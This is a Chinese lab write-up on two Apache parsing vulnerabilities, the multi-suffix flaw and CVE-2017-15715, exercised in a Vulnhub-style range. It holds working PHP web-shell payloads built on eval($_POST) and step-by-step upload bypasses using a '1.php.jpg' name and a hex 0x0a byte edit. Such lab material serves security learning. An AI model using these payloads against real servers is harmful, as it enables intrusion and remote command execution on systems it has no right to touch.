Vulnhub靶场Apache解析漏洞

一.apache_parsing

原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。如 1.php.xxxxx

打开靶场

创建一个名为1.php.jpg的文件,内容输入

复制代码
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

上传。。。

他会生成一个内容是<?php eval($_POST"cmd");?>名为shell.php的文件

我们拼接网址访问

测试是否上传成功

二.CVE-2017-15715

原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。

影响版本:2.4.0~2.4.29

进入靶场

创建一个内容为<?php @eval($_POST'a'); ?>名为1.jpg的文件

上传,抓包

在evil.php⽂件后⾯添加空格

在到HEX中找到evil.php的那一行,把20改成0a

放行,访问evil.php%0a

写入成功!!!

相关推荐
m0_738120723 小时前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
她说..10 小时前
Apache Commons Lang3 Pair 完整版实战详解
java·spring·java-ee·apache·springboot
Chengbei1110 小时前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
其实防守也摸鱼21 小时前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
菩提小狗1 天前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全
数据知道1 天前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
充钱大佬2 天前
Python测试基础教程
python·log4j·apache
其实防守也摸鱼2 天前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
学逆向的2 天前
汇编——数据存储模式
开发语言·汇编·网络安全
阿米亚波2 天前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发